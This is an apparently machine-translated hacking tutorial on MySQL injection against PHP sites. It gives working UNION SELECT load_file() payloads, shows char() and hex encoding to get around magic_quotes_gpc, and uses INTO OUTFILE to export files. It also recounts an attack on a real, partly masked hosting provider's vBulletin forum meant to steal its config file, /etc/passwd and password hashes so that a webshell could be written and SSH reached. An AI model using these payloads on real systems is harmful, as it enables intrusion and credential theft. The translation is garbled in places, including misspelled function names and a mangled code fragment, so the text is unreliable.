Author: angel preface my "SQL Injection with MySQL" ( "hacker defense" topic in July) has been injected for MySQL have a more comprehensive introduction, but there is a hazard rather large function, I was not in the text Refer to, because if this function can be applied, the security of the PHP or even the server will be greatly reduced. Since the "SQL INJECTION with MySQL" is in the summer vacation, considering many newers, students and morally corrupted people So I didn't write this in this article, in fact, this article has been written in early May. After the topic, many people have turned to PHP MySQL injection research, and many new technologies will be excavated, and we have mastered the unusless senior skills will be announced. As for the relatively basic thing, this article is no longer mentioned. In detail, in the SQL statement, you can use a variety of MySQL built-in functions, often use Database (), user (), system_user (), session_user (), current_user () these functions to get some system information, There is also a more function that is more use, that is, load_file (), the function of this function is to read the file and return the file as a string. Seeing this, you should think about what we can do, just read some confidential files, but it is also conditional restrictions: To read the file must be specified on the server must specify the full path must have permission to read and the file must be complete The readable read file must be smaller than max_allowed_packet if the file does not exist, or because any of the above reasons cannot be read, the function returns to empty. More difficult is permission, under Windows, if the NTFS is set properly, you cannot read the relevant file, when you encounter the file that only Administrators can access, users don't want to go out. In actual injection, we have two difficulties need to resolve: Absolute physical path construct effective malformed statements in many PHP programs, when submitting an error Query, if Display_errors = ON, the program exposes the absolute path of the web directory, Just know the path, then for an injectable PHP program, the security of the entire server will be seriously threatened. The constructing statement is already small. Use us to assume a program's SQL statement as follows: Select * from article where articleid = ID Note: Current conditions: magic_quotes_gpc = OFF, C: /Boot.ini readable. At this point, we construct $ ID: -1 Union SELECT 1, 1, 1, 1, LOAD_FILE ('c: /boot.ini') Our Query becomes: Select * from article where articleid = -1 union Select 1, 1, 1, 1, load_file ('c: /boot.ini') program will display C: /Boot.ini content, but now Magic_QUOTES_GPC = Off is small, how can I construct? What is the statement that is not quoted? Friends who have seen "SQL INJECTION with MySQL" must know that with a char () function or convert the character into 16, it is true, that is, it.
Note: Current conditions: magic_quotes_gpc = ON, C: /Boot.ini is readable. We construct $ ID: -1 Union Select 1, 1, 1, loading_file (char (99, 58, 47, 98, 111, 105)) "CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)" is "C: / Boot.ini "ASCII code, our Query became: Select * from article where articleid = -1 union Select 1, 1, 1, loading_file (char (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)) We can also Successfully read the boot.ini file, and convert the string to 16-based, "C: /Boot.ini" 16-based 16-based "0x633A2F626F6F742E696E69", so the above statement can be like this: SELECT * FROM ARTICLE Where articleid = -1 Union Select 1, 1, 1, load_file (0x633a2f626f6f742e696e69) is short, see people like it, you can enter the following query in phpmyadmin or mysql> slowly study. SELECT LOAD_FILE ([String]) Of course, in practical applications, due to various conditions, the content of the file may not be displayed, we can also export files with INTO OUTFILE. Everyone has known how to use it, I don't say a detail, see an instance explains everything. Example www. *** Host.cn is a famous FreeBSD host provider, we will test him, because it uses the VBB Forum in Calendar.php, I don't need to find a vulnerability everywhere. Site (although it is everywhere). This is a complete safety test. Just get information, I didn't enter the server.
Here, you can add a piece of code on the root directory of VBB. Each ($ arr)) {if ($ key! = "templatesused" and $ key! = "argc" and $ key! = "argv") {if (is_string ($ val) and (strtoupper ($ key)! = $ key or "" == "$ key")) {$ arr ["$ key"] = stripslashes ($ val);} else if (is_ARRAY ($ val)) == 'http_post_vars' or $ key == 'http_get_vars' or start ($ key)! = $ Key)) {$ arr ["$ key"] = stripslasheser ($ val);}}} returnid (GET_MAGIC_QUOTES_GPC () and is_ARRAY ($ global)) {if (isset ($ attachment) {$ globals [attachment '] = addslashes ($ globals [tttachment']);} if (isset ($ avatarfile) { $ GLOBALS [ 'avatarfile'] = addslashes ($ GLOBALS [ 'avatarfile']);} $ GLOBALS = stripslashesarray ($ GLOBALS);} set_magic_quotes_runtime (0); if the action code is magic_quotes_gpc opened, remove all the special characters The front escape character, so, regardless of the state of Magic_QUOTES_GPC in php.ini, the single quotes we entered have no effect, you can inject it. Ha ha. We know, submit: /calendar.php?action=edit&Eventid=1 Union SELECT 1, 1, 1, 1, userid = 1 is to get the username and password MD5 hash, but due to special reasons, Not displayed, but with my experience, I know that there is no configuration, so we can read and export into files.
Because I have no intention to access files containing phpinfo () in advance, I know the absolute path of the web. From the accessed site, I found that a download system is generated by generating an HTML file. If that directory does not write permission, it is not possible to generate HTML Document, but all this is not the focus of this article. We now master the following information: Web absolute path: / home / 4ngel can write directory path: / home / 4ngel / Soft / Magic_quotes_gpc = on and host root Compared to host root, Forum ADMIN It's not interested in it, I am not interested in the forum admin, we have to read the Forum configuration file and / etc / passwd, know the mysql connection information, you can start from here, write Webshell or other things, know / etc / Passwd we can run password. Go directly from SSH. VBB Forum configuration file in /Home/4Ngel/forum/admin/config.php, converts to ASCII code, submitted: Calendar.php? Action = Edit & EventId = 1 Union Select 1, 1, 1, 1, 1, loading_file (char (47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user wHERE userid = 1 into outfile '/home/4ngel/soft/cfg.txt' Oh, plus remember to set a condition where a Otherwise, if the forum is a lot, then the exported file will be quite large.
